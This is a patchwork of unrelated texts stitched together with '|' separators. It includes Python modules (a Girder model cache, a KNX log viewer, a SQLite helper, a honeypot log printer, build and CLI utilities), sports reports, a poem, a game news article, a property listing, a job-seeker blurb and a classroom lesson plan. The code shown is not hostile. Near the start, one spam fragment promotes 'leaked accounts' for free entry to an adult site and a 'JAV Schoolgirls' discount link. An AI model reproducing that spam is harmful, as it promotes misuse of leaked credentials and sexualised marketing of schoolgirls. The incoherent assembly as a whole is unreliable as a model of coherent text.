I too use Mailwasher all the time as it downloads just the headers and therefore gives better virus protection. Also, it is so easy to put a tick in a box to blacklist e-mail or set friends.
I am using G-Lock SpamCombat and happy with it. It works independently of any email client and deletes spam directly from the server. You can use the whitelist, blacklist as well as train the Bayesian filter. Now I don't even see spam in my Inbox.
|
#############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
import cherrypy
import time
from girder.api.rest import getCurrentToken
from girder.utility.model_importer import ModelImporter
# Cache of previously loaded models, keyed on (model name, token string, id).
LoadModelCache = {}
LoadModelCacheMaxEntries = 100
LoadModelCacheExpiryDuration = 300  # seconds


def invalidateLoadModelCache(*args, **kwargs):
    """Drop every entry from the load-model cache.

    Accepts and ignores arbitrary arguments so it can be bound directly to
    event callbacks that pass payloads.
    """
    LoadModelCache.clear()
def loadModel(resource, model, plugin='_core', id=None, allowCookie=False,
              level=None):
    """
    Load a model based on id using the current cherrypy token parameter for
    authentication, caching the results. This must be called in a cherrypy
    context.

    :param resource: the resource class instance calling the function. Used
    for access to the current user and model importer.
    :param model: the model name, e.g., 'item'.
    :param plugin: the plugin name when loading a plugin model.
    :param id: a string id of the model to load.
    :param allowCookie: true if the cookie authentication method is allowed.
    :param level: access level desired.
    :returns: the loaded model.
    """
    key = tokenStr = None
    # Resolve the token string: an explicit query parameter wins, then the
    # Girder-Token header, then (only when permitted) the girderToken cookie.
    if 'token' in cherrypy.request.params:  # Token as a parameter
        tokenStr = cherrypy.request.params.get('token')
    elif 'Girder-Token' in cherrypy.request.headers:
        tokenStr = cherrypy.request.headers['Girder-Token']
    elif 'girderToken' in cherrypy.request.cookie and allowCookie:
        tokenStr = cherrypy.request.cookie['girderToken'].value
    # The token is part of the cache key, so the same id requested under a
    # different token is a separate entry and access control still applies.
    key = (model, tokenStr, id)
    cacheEntry = LoadModelCache.get(key)
    if cacheEntry and cacheEntry['expiry'] > time.time():
        entry = cacheEntry['result']
        cacheEntry['hits'] += 1
        # NOTE(review): on a cache hit neither getCurrentToken() is called
        # nor request.girderAllowCookie set -- confirm downstream code does
        # not rely on those side effects.
    else:
        # we have to get the token separately from the user if we are using
        # cookies.
        if allowCookie:
            getCurrentToken(allowCookie)
            cherrypy.request.girderAllowCookie = True
        entry = ModelImporter.model(model, plugin).load(
            id=id, level=level, user=resource.getCurrentUser())
        # If the cache becomes too large, just dump it -- this is simpler
        # than dropping the oldest values and avoids having to add locking.
        if len(LoadModelCache) > LoadModelCacheMaxEntries:
            LoadModelCache.clear()
        LoadModelCache[key] = {
            'id': id,
            'model': model,
            'tokenId': tokenStr,
            'expiry': time.time() + LoadModelCacheExpiryDuration,
            'result': entry,
            'hits': 0
        }
    return entry
|
Below we’ve posted leaked accounts to get into r18.com members area for free!
Are these free R18 logins inactive? Use this promo link to get your Discount on R18 JAV Schoolgirls now. You’ll get a much better price, and full access to R18’s amazing members area. Treat yourself, this R18 JAV Schoolgirls deal is only for a limited time!
|
from time import time, mktime, strptime
import hashlib
import sys
from knxmonitor.Knx.KnxParseException import KnxParseException
from knxmonitor.Knx.KnxParser import KnxParser
class KnxLogViewer(object):
def _readLinesFromFileOrCache(self, infile):
try:
inf = infile
except IOError:
print "%s: Unable to read file: %s" %(sys.argv[0], infile.name)
sys.exit(1);
except:
op.print_help()
sys.exit(1);
print "Reading file: %s" % infile.name
l = inf.readlines()
inf.close()
# Ok, so now we have the file content. However, parsing it
# is expensive, so look for an already parsed cache of the file.
# The cache files first line is the MD5 sum of the infile, which
# we use to see if the cache is up to date. If it is not, re-parse
# the whole in file and update cache. Future enhancement could be
# to use the part of the cache file that is already there.
hsh = hashlib.md5()
for ll in l:
hsh.update(ll)
infile_md5 = hsh.hexdigest()
cachename = infile.name.replace(".hex",".cache")
try:
inf = open(cachename, "r")
clines = inf.readlines()
cache_md5 = clines.pop(0).strip()
if cache_md5 == infile_md5:
# Ok, seems good...
print "Using cached input for file %s" %infile.name
return (None, infile_md5, clines)
else:
print "Cached file found, but hash mismatch"
print "FILE: %s" %infile_md5
print "CACHE: %s" %cache_md5
except IOError:
# No luck in getting cached input, just use the new...
print "No cached input for file %s found..." %infile.name
return (cachename, infile_md5, l)
def __init__(self, devicesfilename, groupaddrfilename, infiles,
dumpGAtable, types, flanksOnly, tail, groupAddressSet = None,
hourly_avg = False, start_time=None):
self.delta = 0
self.delta2 = 0
self.pduCount = 0
self.pduSkipped = 0
self.h_avg = hourly_avg if hourly_avg != None else False
self.dbgMsg = "groupAddressSet = %s" %str(groupAddressSet)
start = time()
#
# Read in all the files...
#
lines = []
lines_meta = []
start = 1
for infile in infiles:
cachename, hash, newLines = self._readLinesFromFileOrCache(infile)
lines.extend(newLines)
lines_meta.append( (infile.name, cachename, hash,
start, len(newLines) ) )
start += len(newLines)
print "Creating parser..."
self.knx = KnxParser(devicesfilename, groupaddrfilename,
dumpGAtable, flanksOnly, types)
if tail != 0:
if tail < len(lines):
lines = lines[len(lines) - tail :]
if start_time != None:
self.found_start = "Trying to locate start time..."
print "Trying to locate start time..."
for i in range(len(lines)-1, 0, -1):
try:
timestamp, pdu = lines[i].split(":LPDU:")
except ValueError:
timestamp, pdu = lines[i].split("LPDU:")
ts = mktime(strptime(timestamp, "%a %b %d %H:%M:%S %Y"))
if ts < start_time:
print "Found start time!"
self.found_start = "Found start time!"
lines = lines[i+1:]
break
else:
self.found_start = "not relevant"
#
# Parsing the input...
#
basetime = 0
lineNo = 0
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
for line in lines:
# Skip empty lines...
if len(line.strip()) < 1:
continue
# If filter specified, skip unwanted GAs
if groupAddressSet != None:
ignore = True
for ga in groupAddressSet:
if line.find(ga) != -1:
ignore = False
break
if ignore:
self.pduSkipped += 1
continue
lineNo += 1
# Differentiate between parsing new files and loading cached input
if line[:2] == "@@":
pass
#print "loading: %s" %line.strip().decode("utf-8")
else:
# Split timestamp from rest...
try:
timestamp, pdu = line.split(":LPDU:")
except ValueError:
timestamp, pdu = line.split("LPDU:")
try:
if basetime == 0:
basetime = mktime(strptime(timestamp,
"%a %b %d %H:%M:%S %Y"))
self.knx.setTimeBase(basetime)
except ValueError:
printVerbose("timestamp error: %s" %timestamp)
try:
self.knx.parseVbusOutput(lineNo, timestamp, pdu)
self.pduCount += 1
except KnxParseException:
print "Failed: %s: %s" %(lineNo, pdu)
sys.exit(1)
# Check if we are into a new file, in which case we should
# potentially update the cache file for the last file...
# Note that the --tail option disables creation of cache files
if (tail == 0) and lineNo == startLine + numLines - 1:
if cachefilename != None:
print "update cache file for %s (%s) at %s" %(origfilename,
cachefilename,
lineNo)
try:
of = open(cachefilename, "w")
except IOError:
print cachefilename
else:
# write hash at first line
of.write("%s\n" % hash)
self.knx.storeCachedInput(of, startLine)
# Shift meta data to new file...
try:
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
except:
print "Last file done, line no (%s)" %lineNo
origfilename, cachefilename, hash, startLine, numLines = (None, None, None, None, None)
if lineNo % 10000 == 0:
print "Parsed %d lines..." %lineNo
print "Parsed %d lines..." %lineNo
self.dbgMsg += "Parsed %d lines..." %lineNo
self.delta = time() - start
def getPerfData(self):
s = "<p>"
s += "found_start: %s<p>"%self.found_start
if self.delta != 0:
s += "KnxLogViewer: Time used for init: %f (%d PDUs parsed, %d skipped)<p>" %(self.delta, self.pduCount, self.pduSkipped)
s += "Debug: %s<p>GlobalDebug:%s<p>" %(self.dbgMsg, globDbgMsg)
self.delta = 0
s += "KnxLogViewer: Time used for plotgen: %f<p>" %self.delta2
s += "<p>"
return s
def getMinMaxValues(self, groupAddr):
return self.knx.getStreamMinMaxValues(groupAddr)
def plotLog(self, groupAddrs, plotImage, addHorLine=None):
start = time()
self.knx.plotStreams(groupAddrs, plotImage, addHorLine)
self.delta2 = time() - start
def printLog(self, groupAddrs):
self.knx.printStreams(groupAddrs)
def printJSON(self, groupAddrs):
self.knx.printStreams(groupAddrs, "JSON")
|
Since December 2016 I have been employed full-time as a Java Developer, working on projects such as an ERP system, a mobile app store, and an application generator. While still employed as a Java Developer, and after freelancing in parallel for a couple of months in Golang and Java, I obtained a permanent remote position as a Go Developer starting in December 2017. Since I enjoy Golang development more than Java, I would like to make a complete transition to Golang.
I am looking for a position where I can code in Golang.
At the moment I would like to work remotely, but at some point I will be looking into relocating to a different country.
|
#!/usr/bin/env python
import sqlite3
import sys
from utils import Utils
class MyDB():
def __init__(self, sqlite_file):
self.sqlite_file = sqlite_file + "spf.sqlite"
#print self.sqlite_file
self.conn = None
if (not self.checkDB()):
self.initDB()
def getCursor(self):
if (self.conn == None):
#print self.sqlite_file
try:
self.conn = sqlite3.connect(self.sqlite_file)
except sqlite3.OperationalError as e:
print e
except:
print sys.exc_info()[0]
return self.conn.cursor()
def checkDB(self):
try:
cursor = self.getCursor()
except:
print sys.exc_info()[0]
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='hosts'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='web_templates'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='ports'")
if cursor.fetchone() is None:
return False
return True
def initDB(self):
cursor = self.getCursor()
cursor.execute("DROP TABLE IF EXISTS users")
cursor.execute("CREATE TABLE users(user TEXT)")
cursor.execute("DROP TABLE IF EXISTS hosts")
cursor.execute("CREATE TABLE hosts(name TEXT, ip TEXT)")
cursor.execute("DROP TABLE IF EXISTS web_templates")
cursor.execute("CREATE TABLE web_templates(ttype TEXT, src_url TEXT, tdir TEXT)")
cursor.execute("DROP TABLE IF EXISTS ports")
cursor.execute("CREATE TABLE ports(port INTEGER, host TEXT)")
self.conn.commit()
return
def addUser(self, user):
cursor = self.getCursor()
cursor.execute('INSERT INTO users VALUES(?)', (user,))
self.conn.commit()
return
def addUsers(self, users):
for user in users:
self.addUser(user)
return
def addHost(self, name, ip=""):
cursor = self.getCursor()
cursor.execute('INSERT INTO hosts VALUES(?,?)', (name, ip,))
self.conn.commit()
return
def addHosts(self, hosts):
for host in hosts:
self.addHost(host)
return
def addPort(self, port, host):
cursor = self.getCursor()
cursor.execute('INSERT INTO ports VALUES(?,?)', (port, host,))
self.conn.commit()
return
def addWebTemplate(self, ttype, src_url, tdir):
cursor = self.getCursor()
cursor.execute('INSERT INTO web_templates VALUES(?,?,?)', (ttype, src_url, tdir,))
self.conn.commit()
return
def getUsers(self):
    """Return the de-duplicated list of stored user names."""
    cursor = self.getCursor()
    cursor.execute('SELECT user FROM users')
    return Utils.unique_list([row[0] for row in cursor.fetchall()])
def getWebTemplates(self, ttype="static"):
    """Return de-duplicated "dir[-]url" strings for the given template type."""
    cursor = self.getCursor()
    cursor.execute('SELECT src_url, tdir FROM web_templates WHERE ttype=?', (ttype,))
    # NOTE(review): rows are (src_url, tdir), so the result is "tdir[-]src_url" —
    # confirm the consumer really expects the directory before the URL.
    return Utils.unique_list(
        [str(row[1]) + "[-]" + str(row[0]) for row in cursor.fetchall()])
|
For the third consecutive season, Warren East ran into a Hopkinsville team hungry for another postseason run.
Hosting the Tigers in the opening round of the Class 4A playoffs for the third time in as many years, the Raiders were dominated on both sides of the ball and dealt a 24-0 loss on Friday night at Jim Ross Field, having their season ended with a 6-5 overall record.
Warren East – which was also eliminated by Hoptown in a 21-7, first-round loss on Nov. 3, 2017 in Bowling Green – was limited offensively and its defense couldn’t keep up with an explosive Tigers’ offense.
Hopkinsville (5-6) led 3-0 after the opening quarter, 10-0 at halftime and went on to add 14 more points to its side of the scoreboard in the second half, never allowing the Raiders to string together any momentum.
Hopkinsville quarterback Ellis Dunn led the way with two total touchdowns – one passing and one rushing – while running back Jordan Hopson also recorded a rushing score to lead the Tigers to their fourth straight win.
With Hopkinsville’s victory, it advances to the second round and will travel to Madisonville-North Hopkins next Friday for a 7:30 p.m. kickoff.
Hopkinsville was the aggressor in the opening half.
While holding Warren East scoreless, the Tigers scored twice in the first and second quarters to lead 10-0 at the break.
Mason Marschand kicked a 34-yard field goal at the 7:10 mark of the first to record the first score of the night, and Dunn later connected with Tayshaun Barker for a 51-yard touchdown with 4:12 left in the second.
Along with its offensive production in the first half, Hopkinsville’s defense was also stout. While forcing Warren East to punt three times, turn it over on downs once and commit a turnover, Raiders’ standout running back Thomas Maxey was held to just 44 yards in the first 24 minutes, while quarterback Nolan Ford had completed just three-of-10 passes for 25 yards with 39 rushing yards.
Maxey – in his final high school game – finished with 71 yards on 21 carries. Ford, a sophomore, went 3-for-12 for 23 yards, while recording 27 yards on 12 carries.
“He’s a character, first and foremost, but he’s a tremendous athlete and a tremendous competitor,” Griffith said of Maxey. “You don’t coach a Thomas Maxey very often in your coaching career. We’ll certainly have big shoes to fill with him.”
Hopkinsville continued to execute in the ensuing half – especially in the third quarter.
Outscoring East 14-0 in the period, Hoptown pushed its advantage to 24-0 and dug the Raiders into an even deeper hole. Dunn’s 23-yard TD run at the 7:34 mark made it 17-0 before Hopson later ran for a 23-yard score of his own to put the Tigers up by three scores and a field goal entering the final frame.
Holding a comfortable lead, Hopkinsville was able to cruise throughout the final 12 minutes and into the second round.
|
"""
Copyright (c) 2014, Are Hansen - Honeypot Development.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__author__ = 'Are Hansen'
__date__ = '2014, Aug 3'
__version__ = '0.0.1'
def fwIRC(data_out):
"""Processes and outputs the results of the firewall.log's parsing for IRC dest. """
print '\n ========= IRC Destinations ========='
for irc, detail in data_out.items():
print ' IRC address: {0:>23}'.format(irc)
for info in detail:
print ' - {0}'.format(info)
print ''
|
Refused the food he offered through her cage.
Slaughtered that morning at too young an age.
Wiser ones warned her: don’t get caught in traps.
Himself in your warmth under moonless skies.
Sprawled and pressed against her cage he would lie.
Unwillingly warmed to his eyes gone wide.
With him she lies. Stray of her feral side.
His eyes are brown like fawns, like bear cub hide.
|
"""Importer of French Département data in MongoDB."""
import typing
from typing import Any, Dict, List
from bob_emploi.data_analysis.lib import cleaned_data
from bob_emploi.data_analysis.lib import mongo
def make_dicts(
        french_departements_tsv: str, french_oversea_departements_tsv: str, prefix_tsv: str) \
        -> List[Dict[str, Any]]:
    """Import départements info in MongoDB.

    Args:
        french_departements_tsv: path to a TSV file containing the main
            information about départements from INSEE.
        french_oversea_departements_tsv: path to a TSV file containing the
            information about oversea collectivities.
        prefix_tsv: path to a TSV file containing the prefix for each
            département.
    Returns:
        A list of dict that maps the JSON representation of Departement protos.
    """
    frame = cleaned_data.french_departements(
        filename=french_departements_tsv,
        oversea_filename=french_oversea_departements_tsv,
        prefix_filename=prefix_tsv)
    # Expose the département code (the DataFrame index) as the Mongo _id field.
    frame['_id'] = frame.index
    records = frame[['_id', 'name', 'prefix']].to_dict('records')
    return typing.cast(List[Dict[str, Any]], records)
if __name__ == '__main__':
    # CLI entry point: run the importer and store the documents in the
    # 'departements' collection.
    mongo.importer_main(make_dicts, 'departements')
|
The animated series will be free to watch on YouTube, and the movie will see release later this year.
Making a blockbuster video game in the modern era takes time, but even by those standards, you could say that developer Square Enix is running the risk of trying gamers’ patience with Final Fantasy XV. It’s been years since the game was first announced, and even though there’s been a steady trickle of previews since then, that doesn’t change the fact that fans have been kept waiting long enough to eat their way through the menus at both of Tokyo’s Final Fantasy themed restaurants.
12 months ago the company released a playable demo of the game, but for its Uncovered Final Fantasy XV fan and press event, held in Los Angeles, it was going to have to throw gamers an even bigger bone. The nicest news about the game itself is that it finally has an official release date: September 30 of this year. Given that the event was held in the U.S., one would assume that this is the date when gamers not just in Japan, but in North America as well will be able to finally play the finished product.
But that wasn’t the only surprise Square Enix had up its sleeve. At one point, the screen’s image of the game’s four male leads quietly switched from CG to anime art.
This probably had some people in the audience confused, as the drawings were too detailed and polished to be just concept art. So why would Square Enix go to the trouble of producing such polished hand-drawn designs?
Because there’s also going to be a Final Fantasy XV anime series, titled Brotherhood Final Fantasy XV.
▼ And here’s the entire first episode.
▼ That this cast has the potential to result in an avalanche of fujoshi fan art? Why yes, I am thinking that.
Part of the anime preview’s on-screen text reads “From childhood to adulthood,” but since that transition is also a major theme of the Final Fantasy XV game, it’s unclear how much of the anime’s and game’s storylines will overlap.
▼ Will Noctis also hate lettuce in the playable Final Fantasy XV? We’ll find out in September!
At the very least, though, it seems to share the game’s penchant for camping and teleporting around to better hit dudes in the face with a sword.
The preview featured Japanese voices with English subtitles, which suggested that it won’t be exclusive to Japan. Of course, the even surer sign was Square Enix’s announcement that you’ll be able to watch all five episodes of Brotherhood Final Fantasy XV for free on YouTube.
And yet, even this isn’t the most ambitious side-project for Final Fantasy XV’s narrative. That honor goes to Kingsglaive Final Fantasy XV, a CG movie set in the game’s world.
In contrast to Brotherhood, none of the game’s four male leads are shown in the Kingsglaive trailer. Instead, the focus seems to be on the power struggle that sets the game’s events in motion, with game protagonist Noctis’ father King Regis and fiancée Luna playing prominent roles.
While the presentation referred to Kingsglaive as a “movie,” it also gave a release date of 2016, which would give the producers a very small window of time to work with drumming up publicity for a full-fledged theatrical release. As such, it seems more likely that Kingsglaive will be handled in a style along the lines of 2005’s Final Fantasy VII: Advent Children, a direct-to-video release with film festival and limited theatrical screenings, as opposed to the general-release commercial and critical flop that was 2001’s Final Fantasy: The Spirits Within. The trailer’s flashy action sequences and character designs also seem more tailored to fans of anime and video games than the mainstream movie-going public at large.
As for the game itself, it’s on track to have the most detailed visuals and expansive environments of any Final Fantasy game to date, with a particular amount of care put into lovingly rendering the great outdoors. And while the tone for Kingsglaive may be dead-serious, the playable Final Fantasy XV won’t be completely devoid of lighter, cuter moments. As part of the presentation, Square Enix finally let us see the game’s versions of Chocobos, Final Fantasy’s flightless avian mounts.
They look as adorable as ever, and since the presentation also showed that they can now perform high-speed drifts, September 30 can’t come soon enough.
Follow Casey on Twitter to make sure you don’t miss the next Chocobo sighting.
Forget cups and cones – Krispy Kreme Japan is sandwiching its ice cream inside doughnuts!
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import os
import pkg_resources
import re
import logging
from edi.lib.helpers import FatalError
# The do_release script will update this version!
# During debuild neither the git version nor the package version is available.
# Used as the last-resort return value of get_edi_version() below.
edi_fallback_version = '0.4.5'
def get_edi_version():
    """
    Get the version of the current edi installation or the version derived from git.

    Resolution order: git metadata (via setuptools_scm) when running from a
    checkout, then the installed distribution, then the hardcoded fallback.

    :return: full edi version string
    """
    here = os.path.dirname(__file__)
    project_root = os.path.abspath(os.path.join(here, "../.."))
    if os.path.isdir(os.path.join(project_root, ".git")):
        # do import locally so that we do not depend on setuptools_scm for the released version
        from setuptools_scm import get_version
        return get_version(root=project_root)
    try:
        return pkg_resources.get_distribution('edi').version
    except pkg_resources.DistributionNotFound:
        logging.warning('Using fallback version {}.'.format(edi_fallback_version))
        return edi_fallback_version
def get_stripped_version(version):
    """
    Strips the suffixes from the version string.

    :param version: Version string that needs to be parsed
    :return: a stripped version string of the format MAJOR[.MINOR[.PATCH]]
    :raises FatalError: if the version string does not start with a number
    """
    # Raw string: '\d' in a plain literal is an invalid escape sequence and
    # raises a warning (and eventually an error) on modern Python versions.
    result = re.match(r'\d+(\.\d+){0,2}', version)
    if result:
        return result.group(0)
    raise FatalError('''Unable to parse version '{}'.'''.format(version))
|
Wow, this is the condo you have been looking for. It's rare to find a 1700+ sq. ft. 3 bedroom, 3 bath condo in Howell. Also included is a full basement and a 2 car garage. This just over 2 year old home was a builders model with many high end features. You will find quality everywhere you look with ceramic tile, Bradford 42 inch maple cabinets, and granite counter tops. Later the owner installed a beautiful dark stained laminate floor. This amazing floor plan is spacious with 2 bedrooms on the main floor with a huge master and loft upstairs. Did I mention this home also has walk-in closets? The other rooms flow perfectly together allowing for a nice sized kitchen, dining room, and great room. With this location being close to highway access, shopping and downtown; it will not last long. Call now for your private showing.
|
"""
This is the main entry point for the ARC cli application
"""
import sys
import types
import logging
import importlib
import functools
import arc.config
import arc.connection
import arc.defaults
import arc.cli.args.parser
__all__ = ['App']
class App(object):
    """
    Base class for CLI application
    """
    def __init__(self, config_klass=None, argument_parser_klass=None):
        """
        Initializes a new app instance.

        This class is intended both to be used by the stock arcli application
        and also to be reused by custom applications. If you want, say, to
        limit the amount of command line actions and its arguments, you can
        simply supply another argument parser class to this constructor. Of
        course another way to customize it is to inherit from this and modify
        its members at will.

        :param config_klass: an optional configuration class. By default it
               will use the arc.config.Config class.
        :param argument_parser_klass: an optional argument parser class. By
               default it will use arc.cli.args.parser.Parser
        """
        #: The application holds a connection instance so that other actions
        #: can simply use an already initialized connection for convenience
        self.connection = None
        self.log = None
        self._initialize_log()
        self.config = None
        self.config_klass = config_klass
        self._initialize_config()
        self.argument_parser = None
        self.argument_parser_klass = argument_parser_klass
        self.parsed_arguments = None
        self._initialize_argument_parser()

    def _initialize_log(self):
        """
        Initializes a log instance based on the class name
        """
        logging.basicConfig()
        self.log = logging.getLogger(self.__class__.__name__)

    def _initialize_config(self):
        """
        Initializes the configuration system

        We keep track of the configuration class used in case it was overriden
        """
        if self.config_klass is None:
            self.log.debug("Initializing default config class")
            self.config = arc.config.get_default()
        else:
            self.log.debug("Initializing user supplied config class: %s",
                           self.config_klass)
            self.config = self.config_klass()

    def _initialize_argument_parser(self):
        """
        Initialize the argument parser, either the default or supplied one
        """
        if self.argument_parser_klass is None:
            self.log.debug("Initializing default argument parser class")
            self.argument_parser = arc.cli.args.parser.Parser(self.config)
            self.argument_parser.add_arguments_on_all_modules()
        else:
            self.log.debug("Initializing user supplied argument parser class:"
                           " %s", self.argument_parser_klass)
            self.argument_parser = self.argument_parser_klass(self.config)

    def parse_arguments(self):
        """
        Parse the arguments from the command line
        """
        self.parsed_arguments = self.argument_parser.parse_args()
        if hasattr(self.parsed_arguments, "top_level_action"):
            self.log.debug("Action (subparser): %s",
                           self.parsed_arguments.top_level_action)

    def initialize_connection(self):
        """
        Initialize the connection instance
        """
        if self.connection is not None:
            self.log.debug("Connection is already initialized")
        else:
            if hasattr(self.parsed_arguments, "host"):
                h = self.parsed_arguments.host
                self.log.debug("Connecting to: %s", h)
                try:
                    self.connection = arc.connection.Connection(h)
                except arc.connection.InvalidServiceVersionError:
                    self.log.error("The RPC interface version on the connected "
                                   "server is more recent than this version of "
                                   "arc can support. Please use a more recent "
                                   "version of arc that should include support "
                                   "for the latest Autotest version.")
                    raise SystemExit
            else:
                # Logger.warn() is deprecated (removed in Python 3.13);
                # warning() is the supported spelling.
                self.log.warning("Host setting not present on arguments, not "
                                 "initializing a connection")

    def dispatch_action(self):
        """
        Calls the actions that was specified via command line arguments.

        This involves loading the relevant module file.
        """
        module_name = "%s.%s" % (arc.defaults.ACTIONS_MODULE_PREFIX,
                                 self.parsed_arguments.top_level_action)
        self.log.debug("Attempting to load action module: %s", module_name)
        try:
            module = importlib.import_module(module_name)
            self.log.debug("Action module loaded: %s", module)
        except ImportError:
            self.log.critical("Could not load action module: %s", module_name)
            return

        # Filter out the attributes out of the loaded module that look
        # like command line actions, based on type and 'is_action' attribute
        module_actions = {}
        for attribute_name, attribute in module.__dict__.items():
            if isinstance(attribute, (types.FunctionType, functools.partial)):
                if getattr(attribute, 'is_action', False):
                    module_actions[attribute_name] = attribute

        chosen_action = None
        for action in module_actions.keys():
            if getattr(self.parsed_arguments, action, False):
                self.log.debug("Calling action %s from module %s",
                               action, module_name)
                chosen_action = action
                break

        kallable = module_actions.get(chosen_action, None)
        if kallable is not None:
            self.initialize_connection()
            return kallable(self)
        else:
            self.log.error("Action %s specified, but not implemented",
                           chosen_action)

    def run(self):
        """
        Main entry point for application
        """
        self.parse_arguments()
        action_result = self.dispatch_action()
        # bool must be tested before int: bool is a subclass of int, so the
        # previous int-first check turned a True (success) result into
        # sys.exit(True), i.e. exit status 1 — the exact opposite of intended.
        if isinstance(action_result, bool):
            sys.exit(0 if action_result else 1)
        elif isinstance(action_result, int):
            sys.exit(action_result)
|
Hendrick Is Getting Along Just Fine!
Record signing Jeff Hendrick insists he is getting along just fine at Burnley!
The Clarets midfielder has spent his first week being teased by new team mates regarding the fines system in place at the training ground for minor misdemeanours.
The Friday fines’ ritual is all a part of the incredible team spirit engendered by staff and players.
And despite several attempts to catch him out, the Republic of Ireland ace has been given a welcome helping hand by international team mate Stephen Ward to keep on the right side of the line!
“There’s been a few rules around with fines for doing certain things, such as leaving bottles lying around and silly little things like that, but luckily I’ve had a week’s grace and they have let a few things slide,” Hendrick laughed.
“I’ve been using that to test the water to find out what is a fineable offence and they’ve been waiting to catch me out.
“Wardy has been helping me to be fair, which is nice, but a few of the others have been making me worry!
“I’m on top if it now, but there was no rule book there for me to read!
“I’ve had to pick up the rules as I’ve gone along with Pat (Bamford)!"
Hendrick is now facing a challenge of a different kind ahead of the Clarets trip to Leicester City this weekend.
New players are usually asked to perform a song in front of the squad of their first away game.
But the former Derby County midfield ace is happy to go with the flow ahead of what he hopes will be a full debut at the King Power Stadium.
He said: “If the lads want me to sing a song, I’ll do that.”
He added: “The first week here has been hard work and I was told it would be, but I’ve enjoyed it.
“I know I am going to get fitter here and I’m going to have to work hard.
“I enjoyed the 10 minutes (against Hull) and it would have been a good start to get the three points, but hopefully I can be a part of that in the coming weeks.
“I’ve played against Leicester a few times in the Championship and had a few heavy defeat at their place over the years, but I watched them last year and I think everyone was rooting for them.
“They have done well, but I think they might find it hard this year.
Clarets Player HD will have full match commentary from The King Power Stadium tomorrow, with Dave Roberts joining Phil Bird behind the mic. CLICK HERE FOR MORE DETAILS.
|
"""Extra configuration for build"""
class ConfigBuild:
    """Build configuration"""

    # Set to True to turn off compilertools's optimization while building.
    disabled = False

    # Compile optimized for the current machine only, instead of for a matrix
    # of possible target machines. Use True/False to force a value, or
    # "autodetect" to enable it automatically when building from PIP.
    current_machine = "autodetect"

    # Whitelist of suffixes for the files matrix definition: when non-empty,
    # only these suffixes are built. Does not affect current-machine builds.
    suffixes_includes = set()

    # Blacklist of suffixes: consulted only when 'suffixes_includes' is empty,
    # to skip building files for a specific architecture. Does not affect
    # current-machine builds.
    suffixes_excludes = {
        "sse",
        "ssse3",
        "sse4_1",
        "sse4_2",
        "intel_atom",
        "intel",
        "amd",
    }

    # Compiler option toggles ("fast_fpmath": fast floating point math).
    option = {"fast_fpmath": False}

    # APIs auto-enabled when compiling/linking if one of these preprocessor
    # markers is found in the source files.
    api = {
        # openMP
        "openmp": {"c": "#pragma omp ", "fortran": ("!$omp ", "c$omp ", "*$omp ")},
        # OpenACC
        "openacc": {"c": "#pragma acc ", "fortran": ("!$acc ", "c$acc ", "*$acc ")},
        # Intel Cilk Plus
        "cilkplus": {"c": "#pragma simd ", "fortran": "!dir$ simd "},
    }

    # Recognized source file extensions, per language, for code analysis.
    extensions = {
        "c": (".c", ".cpp", ".cxx", ".cc", ".c++", ".cp"),
        "fortran": (".f", ".for", ".f90", ".f95", ".f03", ".f08", ".f15"),
    }
|
SWBAT use their peers to help them edit and revise their writing in order to help focus on how well the components of the memoir unit have been addressed.
1) Give my draft that I want to publish with my rubric to my writing partner.
2) Ask them to look for something specific that I would like help with.
3) Accept my partner’s second opinion, but also follow the rubric.
I will ask for a student volunteer to help model this with me. I will show them how I give my draft to a student and ask them to look for something specific (using sensory details for example).
Active Engagement: I will say,” Give your draft and rubric to your writing partner."
See (setting students up for success with writing partners) for an explanation of how I set partnerships up.
